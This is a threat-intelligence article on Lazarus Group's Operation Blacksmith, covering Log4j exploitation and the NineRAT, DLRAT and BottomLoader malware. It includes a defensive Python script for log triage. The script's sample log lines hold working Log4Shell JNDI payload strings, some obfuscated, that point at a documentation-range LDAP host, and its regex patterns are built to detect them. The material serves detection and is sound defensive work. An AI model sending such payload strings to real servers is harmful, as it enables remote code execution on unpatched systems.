
Operation Blacksmith: Lazarus Group Exploits Log4j Flaws to Deploy RATs

A new global campaign that exploits the infamous Log4j flaw to deploy three previously undocumented DLang-based malware families, NineRAT, DLRAT, and BottomLoader, has been attributed to the North Korea-linked threat group Lazarus.

The campaign, dubbed Operation Blacksmith, is believed to have been active since March, targeting organizations in the manufacturing, agriculture, and physical security sectors.

A glance at the infection process

Initial access begins with the successful exploitation of the Log4j vulnerability (CVE-2021-44228) on publicly facing VMware Horizon servers.
  • Once initial reconnaissance has been completed, the attackers deploy the HazyLoad proxy tool to establish a foothold on the infected systems.
  • HazyLoad is downloaded and executed using another malware called BottomLoader.
  • In certain instances, researchers observed the threat actors using a new remote IP address instead of HazyLoad for communication.
  • Upon gaining access to a system, they create an additional user account with administrative privileges and, in the final stage, deploy NineRAT to collect system information and other sensitive details.
  • The campaign has also been observed delivering DLRAT, which deploys additional malware, retrieves commands from the C2, and executes them on the compromised systems.

More about NineRAT

  • Initially built around May 2022, NineRAT was first used in this campaign in March to target a South American agricultural organization.
  • Later in September, the malware was used against a manufacturing entity in Europe.
  • NineRAT uses Telegram as its C2 channel to receive commands to gather system information, communicate its output, and even uninstall and upgrade itself.
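Two of the indicators described above lend themselves to simple log triage: JNDI lookup strings in web-server access logs (the Log4j exploitation that opens the infection chain) and a server in the inventory reaching the Telegram API (the C2 channel attributed to NineRAT). The script below is an added, defender-side example; it is not code from this write-up or from the researchers it summarizes. The access-log and connection-log formats, the hostnames, and the `triage` helper are assumptions, and every log line is a constructed sample.

```python
"""
Added triage helpers for two indicators from the Operation Blacksmith write-up:
Log4Shell (CVE-2021-44228) probes in access logs and server egress to telegram.org.
Log formats, hostnames and sample lines are constructed for this example.
"""
import re
from urllib.parse import unquote

# Log4j resolves nested lookups such as ${lower:j}, ${upper:n} and the
# default-value form ${env:MISSING:-j}, which lets a probe hide the literal
# "${jndi:" from naive string matching. _WRAPPER strips one layer of such
# wrappers; normalize() repeats until nothing changes. This is a detection
# heuristic, not a full implementation of Log4j lookup semantics.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def normalize(text: str) -> str:
    """Undo URL encoding and Log4j lookup wrappers so a JNDI lookup reads plainly."""
    s = unquote(unquote(text))  # double-encoded probes are common
    for _ in range(8):  # bounded: wrappers only nest a few levels in practice
        new = _WRAPPER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
        if new == s:
            break
        s = new
    return s.lower()


def is_log4shell_probe(log_line: str) -> bool:
    """True if any field of the access-log line carries a JNDI lookup."""
    plain = unquote(unquote(log_line)).lower()
    return _JNDI.search(plain) is not None or _JNDI.search(normalize(log_line)) is not None


# Assumed connection-log format: "... src=IP host=NAME dst=DOMAIN:PORT ..."
_CONN = re.compile(r"src=(?P<src>\S+)\s+host=(?P<host>\S+)\s+dst=(?P<dst>[^:\s]+)")


def is_unexpected_telegram_egress(conn_line: str, server_hosts: set) -> bool:
    """True when a host from the server inventory talks to a telegram.org domain.
    User endpoints are excluded because Telegram may be legitimate there."""
    m = _CONN.search(conn_line)
    if not m:
        return False
    dst = m.group("dst").lower()
    return m.group("host") in server_hosts and (dst == "telegram.org" or dst.endswith(".telegram.org"))


def triage(access_lines, conn_lines, server_hosts):
    """Return the lines worth an analyst's attention, grouped by indicator."""
    return {
        "log4shell_probes": [l for l in access_lines if is_log4shell_probe(l)],
        "telegram_egress": [l for l in conn_lines if is_unexpected_telegram_egress(l, server_hosts)],
    }


# Constructed sample telemetry (RFC 5737 documentation addresses, not real hosts).
ACCESS_LOG = [
    '203.0.113.7 - - [12/Nov/2023:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Nov/2023:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.9 - - [12/Nov/2023:10:00:03 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.5%2Fa%7D HTTP/1.1" 400 0 "-" "curl/8.0"',
    '203.0.113.9 - - [12/Nov/2023:10:00:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.5/a}" "curl/8.0"',
]
CONN_LOG = [
    "2023-11-12T10:01:03Z src=10.20.30.40 host=horizon-web-01 dst=api.telegram.org:443 bytes_out=812",
    "2023-11-12T10:01:09Z src=10.20.30.41 host=horizon-web-02 dst=updates.example.net:443 bytes_out=2048",
    "2023-11-12T10:02:15Z src=10.50.1.23 host=laptop-j-doe dst=api.telegram.org:443 bytes_out=900",
]
SERVER_HOSTS = {"horizon-web-01", "horizon-web-02"}  # assumed asset inventory

if __name__ == "__main__":
    for kind, lines in triage(ACCESS_LOG, CONN_LOG, SERVER_HOSTS).items():
        print(f"{kind}: {len(lines)} hit(s)")
        for line in lines:
            print("   ", line)
```

The normalization step is what makes the access-log check useful: the second, third and fourth sample lines all resolve to the same `${jndi:ldap://...}` lookup even though only one of them contains that string literally. Run over real logs, the hits are leads for investigation, and a patched or mitigated Log4j instance will still show the probe without being affected by it; the Telegram check is only meaningful against a maintained list of hosts that should never have such egress.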

It is worth noting that the group has been increasingly using non-traditional frameworks to add new malware families to its arsenal. Previously, the group was linked to the MagicRAT and QuiteRAT malware, both built on QtFramework.

Conclusion

The wide exploitation of the Log4j flaw even after a year is a stark reminder for organizations to apply security patches. Moreover, as Lazarus continues to update its malicious arsenal with new capabilities, organizations are advised to engage with threat intelligence sharing platforms to stay ahead of the curve in protecting their systems.
Publisher: Cyware